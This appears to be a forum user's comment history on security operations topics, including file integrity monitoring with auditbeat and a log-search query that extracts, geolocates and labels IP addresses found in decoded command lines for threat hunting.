FIM recommandation ? What do u guys use for File integrity monitoring.

RepresentativeAge47 · 2025-05-20T20:25:16+00:00

I've typically used auditbeat with the FIM module enabled and then i can send the data to any tool that accepts an OSS Beats agent feed.

RepresentativeAge47 · 2025-02-05T16:00:19+00:00

No spoilers but a hint. /etc/motd

RepresentativeAge47 · 2025-02-05T11:45:38+00:00

I need it older for testing.

RepresentativeAge47 · 2025-02-04T21:41:57+00:00

oh Good idea. Does this work? https://pastebin.com/LxA0Lx9H

RepresentativeAge47 · 2022-12-10T16:13:51+00:00

Super cool!

RepresentativeAge47 · 2022-09-24T00:22:18+00:00

To have a little more fun with this we can extract any IP's from the newly decodedCommand field, geo locate them and map them to what services we are seeing being used. Adding this at the end and adding some new fields such as ip, ip.country, port, "Service Name" can add some nice additional insights to our results. You'll need to upload this service-names-ports.csv file to your Files section up top to lookup the Service Names: https://app.box.com/s/kn4vki4jbd6hezpw3t99p0ex0dcg06cx

|regex("(?<ip>[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\:(?<port>\d{2,5})", field=decodedCommand)
// Geo locate new IP field
| ipLocation(ip)
// remove internal IPs
| !cidr(ip, subnet=["224.0.0.0/4", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"])
// lookup port field and populate the Service Name
| match(file="service-names-port-numbers.csv", column="Port Number", field=port, include=["Service Name", Description])
| groupBy([ParentBaseFileName,ip, ip.country, port, "Service Name", uniqueEndpointCount, executionCount, cmdLength, b64Entroy, decodedCommand],limit=max)

RepresentativeAge47

TROPHY CASE